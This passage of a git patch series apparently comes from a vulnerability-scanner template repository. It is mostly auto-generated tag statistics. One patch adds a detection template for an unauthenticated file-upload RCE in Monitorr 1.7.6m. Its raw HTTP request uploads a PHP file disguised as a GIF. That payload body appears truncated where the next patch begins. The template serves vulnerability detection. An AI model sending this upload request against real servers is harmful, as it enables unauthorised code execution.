| | | | -| sqlite | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | | plastic | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| cve2007 | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | | bruteforce | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | | wifisky | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| cve2010 | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| cve2007 | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | | mobileiron | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| targa | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | From b32ccad2c8e7ff398c39801d9429422e8cb87c87 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 20 Jul 2021 08:20:18 +0900 Subject: [PATCH 110/149] Create monitorr-rce.yaml This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/monitorr-rce.yaml | 51 +++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 vulnerabilities/other/monitorr-rce.yaml diff --git a/vulnerabilities/other/monitorr-rce.yaml b/vulnerabilities/other/monitorr-rce.yaml new file mode 100644 index 0000000000..86f592d6d9 --- /dev/null +++ b/vulnerabilities/other/monitorr-rce.yaml @@ -0,0 +1,51 @@ +id: monitorr-rce + +info: + name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. + reference: | + - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ + - https://www.exploit-db.com/exploits/48980 + tags: monitorr,rce,oob + +requests: + - raw: + - | + POST /assets/php/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 + Accept-Encoding: gzip, deflate + Accept: text/plain, */*; q=0.01 + Connection: close + Accept-Language: en-US,en;q=0.5 + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745 + Origin: http://{{Hostname}} + Referer: http://{{Hostname}} + Content-Length: 319 + + -----------------------------31046105003900160576454225745 + Content-Disposition: form-data; name="fileToUpload"; filename="nuclei_poc.php" + Content-Type: image/gif + + GIF89a213213123 Date: Mon, 19 Jul 2021 23:21:29 +0000 Subject: [PATCH 111/149] Auto Generated Templates Stats [Mon Jul 19 23:21:29 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1125 +++++++++++++++++++++--------------------- 2 files changed, 564 insertions(+), 563 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index e29c8178d0..89fb334609 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"sqli","count":29},{"name":"oracle","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"logs","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"cisco","count":15},{"name":"listing","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"springboot","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"php","count":8},{"name":"cve2013","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"xxe","count":6},{"name":"backup","count":6},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"ruijie","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"confluence","count":5},{"name":"headless","count":5},{"name":"laravel","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"jetty","count":5},{"name":"solr","count":5},{"name":"nodejs","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"webserver","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"ibm","count":4},{"name":"tomcat","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"router","count":4},{"name":"django","count":4},{"name":"elastic","count":4},{"name":"thinkphp","count":4},{"name":"docker","count":4},{"name":"netgear","count":4},{"name":"cve2009","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"springcloud","count":3},{"name":"lfr","count":3},{"name":"dedecms","count":3},{"name":"git","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"nacos","count":3},{"name":"slack","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"bypass","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"deserialization","count":3},{"name":"windows","count":3},{"name":"openssh","count":3},{"name":"ebs","count":3},{"name":"kubernetes","count":3},{"name":"amazon","count":3},{"name":"crlf","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"r-seenet","count":3},{"name":"microstrategy","count":3},{"name":"backups","count":3},{"name":"ofbiz","count":3},{"name":"caucho","count":3},{"name":"terramaster","count":3},{"name":"grafana","count":3},{"name":"cve2008","count":2},{"name":"intrusive","count":2},{"name":"rockmongo","count":2},{"name":"seeyon","count":2},{"name":"proxy","count":2},{"name":"nexus","count":2},{"name":"zhiyuan","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"vrealize","count":2},{"name":"httpd","count":2},{"name":"natshell","count":2},{"name":"hashicorp","count":2},{"name":"pega","count":2},{"name":"hjtcloud","count":2},{"name":"ecology","count":2},{"name":"coldfusion","count":2},{"name":"trixbox","count":2},{"name":"rstudio","count":2},{"name":"sonicwall","count":2},{"name":"ucmdb","count":2},{"name":"exposures","count":2},{"name":"mail","count":2},{"name":"service","count":2},{"name":"couchdb","count":2},{"name":"fortios","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"icewarp","count":2},{"name":"leak","count":2},{"name":"yapi","count":2},{"name":"jboss","count":2},{"name":"cache","count":2},{"name":"dos","count":2},{"name":"prometheus","count":2},{"name":"bigip","count":2},{"name":"telerik","count":2},{"name":"rockethchat","count":2},{"name":"paloalto","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"flir","count":2},{"name":"xxljob","count":2},{"name":"idrac","count":2},{"name":"odoo","count":2},{"name":"kibana","count":2},{"name":"emerge","count":2},{"name":"strapi","count":2},{"name":"globalprotect","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"wordfence","count":2},{"name":"openam","count":2},{"name":"nextjs","count":2},{"name":"chamilo","count":2},{"name":"splunk","count":2},{"name":"keycloak","count":2},{"name":"showdoc","count":2},{"name":"sharepoint","count":2},{"name":"shellshock","count":2},{"name":"zabbix","count":2},{"name":"hpe","count":2},{"name":"smtp","count":2},{"name":"smb","count":2},{"name":"frp","count":2},{"name":"hp","count":2},{"name":"saltstack","count":2},{"name":"spark","count":2},{"name":"kentico","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"bitrix","count":2},{"name":"nagios","count":2},{"name":"oauth","count":2},{"name":"synnefo","count":1},{"name":"jsp","count":1},{"name":"salesforce","count":1},{"name":"myucms","count":1},{"name":"postgres","count":1},{"name":"octobercms","count":1},{"name":"dotnet","count":1},{"name":"landray","count":1},{"name":"mediumish","count":1},{"name":"portainer","count":1},{"name":"spectracom","count":1},{"name":"tpshop","count":1},{"name":"node-red-dashboard","count":1},{"name":"cloudflare","count":1},{"name":"cocoon","count":1},{"name":"plugin","count":1},{"name":"zookeeper","count":1},{"name":"faraday","count":1},{"name":"ec2","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"bruteforce","count":1},{"name":"selea","count":1},{"name":"mongo","count":1},{"name":"javamelody","count":1},{"name":"idemia","count":1},{"name":"emby","count":1},{"name":"sco","count":1},{"name":"horde","count":1},{"name":"symfony","count":1},{"name":"netdata","count":1},{"name":"mcafee","count":1},{"name":"opm","count":1},{"name":"zeroshell","count":1},{"name":"email","count":1},{"name":"geddy","count":1},{"name":"centos","count":1},{"name":"jquery","count":1},{"name":"esmtp","count":1},{"name":"chinaunicom","count":1},{"name":"smartsense","count":1},{"name":"metinfo","count":1},{"name":"wavemaker","count":1},{"name":"erp-nc","count":1},{"name":"domxss","count":1},{"name":"ntopng","count":1},{"name":"exchange","count":1},{"name":"wazuh","count":1},{"name":"tapestry","count":1},{"name":"cve2005","count":1},{"name":"mantisbt","count":1},{"name":"status","count":1},{"name":"mirai","count":1},{"name":"viewpoint","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"rmc","count":1},{"name":"clave","count":1},{"name":"discourse","count":1},{"name":"xdcms","count":1},{"name":"razor","count":1},{"name":"turbocrm","count":1},{"name":"extractor","count":1},{"name":"nc2","count":1},{"name":"yachtcontrol","count":1},{"name":"huijietong","count":1},{"name":"szhe","count":1},{"name":"vsphere","count":1},{"name":"rabbitmq","count":1},{"name":"cse","count":1},{"name":"apiman","count":1},{"name":"pgadmin","count":1},{"name":"xiuno","count":1},{"name":"axis","count":1},{"name":"landrayoa","count":1},{"name":"rsyncd","count":1},{"name":"fiori","count":1},{"name":"nsasg","count":1},{"name":"diris","count":1},{"name":"etouch","count":1},{"name":"zzzcms","count":1},{"name":"beanshell","count":1},{"name":"cors","count":1},{"name":"timeclock","count":1},{"name":"tileserver","count":1},{"name":"rfi","count":1},{"name":"stem","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"fastcgi","count":1},{"name":"jeewms","count":1},{"name":"expn","count":1},{"name":"firebase","count":1},{"name":"2014","count":1},{"name":"cgi","count":1},{"name":"triconsole","count":1},{"name":"avalanche","count":1},{"name":"primetek","count":1},{"name":"tamronos","count":1},{"name":"enumeration","count":1},{"name":"hadoop","count":1},{"name":"netrc","count":1},{"name":"pacsone","count":1},{"name":"itop","count":1},{"name":"pippoint","count":1},{"name":"phpinfo","count":1},{"name":"fortigate","count":1},{"name":"linksys","count":1},{"name":"cve2010","count":1},{"name":"pulsesecure","count":1},{"name":"acexy","count":1},{"name":"wifisky","count":1},{"name":"krweb","count":1},{"name":"panabit","count":1},{"name":"spf","count":1},{"name":"svn","count":1},{"name":"kyan","count":1},{"name":"moinmoin","count":1},{"name":"ulterius","count":1},{"name":"cobub","count":1},{"name":"svnserve","count":1},{"name":"dotnetnuke","count":1},{"name":"mpsec","count":1},{"name":"lotuscms","count":1},{"name":"nps","count":1},{"name":"majordomo2","count":1},{"name":"ruby","count":1},{"name":"plc","count":1},{"name":"skywalking","count":1},{"name":"opencast","count":1},{"name":"saltapi","count":1},{"name":"ricoh","count":1},{"name":"cve2007","count":1},{"name":"openerp","count":1},{"name":"azure","count":1},{"name":"oscommerce","count":1},{"name":"dlogin","count":1},{"name":"webftp","count":1},{"name":"blue-ocean","count":1},{"name":"dom","count":1},{"name":"sqlite","count":1},{"name":"robomongo","count":1},{"name":"appweb","count":1},{"name":"shopware","count":1},{"name":"linkedin","count":1},{"name":"adminer","count":1},{"name":"ssltls","count":1},{"name":"glances","count":1},{"name":"socomec","count":1},{"name":"parentlink","count":1},{"name":"klog","count":1},{"name":"wso2","count":1},{"name":"nordex","count":1},{"name":"mautic","count":1},{"name":"nette","count":1},{"name":"wp-theme","count":1},{"name":"wooyun","count":1},{"name":"viewlinc","count":1},{"name":"redhat","count":1},{"name":"gloo","count":1},{"name":"nuxeo","count":1},{"name":"jfrog","count":1},{"name":"optiLink","count":1},{"name":"xunchi","count":1},{"name":"vsftpd","count":1},{"name":"xff","count":1},{"name":"nomad","count":1},{"name":"csrf","count":1},{"name":"favicon","count":1},{"name":"rhymix","count":1},{"name":"redwood","count":1},{"name":"ambari","count":1},{"name":"maccmsv10","count":1},{"name":"scs","count":1},{"name":"ns","count":1},{"name":"bitly","count":1},{"name":"openstack","count":1},{"name":"haproxy","count":1},{"name":"clockwatch","count":1},{"name":"aspnuke","count":1},{"name":"fedora","count":1},{"name":"pyramid","count":1},{"name":"memcached","count":1},{"name":"linkerd","count":1},{"name":"ems","count":1},{"name":"woocomernce","count":1},{"name":"wmt","count":1},{"name":"mysql","count":1},{"name":"interlib","count":1},{"name":"timesheet","count":1},{"name":"alerta","count":1},{"name":"enum","count":1},{"name":"ioncube","count":1},{"name":"biometrics","count":1},{"name":"nexusdb","count":1},{"name":"acme","count":1},{"name":"octoprint","count":1},{"name":"floc","count":1},{"name":"kubeflow","count":1},{"name":"swagger","count":1},{"name":"arl","count":1},{"name":"sprintful","count":1},{"name":"ssl","count":1},{"name":"zcms","count":1},{"name":"calendarix","count":1},{"name":"dvr","count":1},{"name":"druid","count":1},{"name":"jmx","count":1},{"name":"spidercontrol","count":1},{"name":"sidekiq","count":1},{"name":"tensorboard","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"upload","count":1},{"name":"rubedo","count":1},{"name":"openrestry","count":1},{"name":"grails","count":1},{"name":"jnoj","count":1},{"name":"javafaces","count":1},{"name":"traefik","count":1},{"name":"xml","count":1},{"name":"soar","count":1},{"name":"springframework","count":1},{"name":"sarg","count":1},{"name":"mdb","count":1},{"name":"sentry","count":1},{"name":"codeigniter","count":1},{"name":"k8s","count":1},{"name":"jenzabar","count":1},{"name":"zimbra","count":1},{"name":"embedthis","count":1},{"name":"phalcon","count":1},{"name":"fortiweb","count":1},{"name":"clusterengine","count":1},{"name":"tika","count":1},{"name":"gogs","count":1},{"name":"seacms","count":1},{"name":"payara","count":1},{"name":"bookstack","count":1},{"name":"aura","count":1},{"name":"nedi","count":1},{"name":"fuelcms","count":1},{"name":"fortigates","count":1},{"name":"a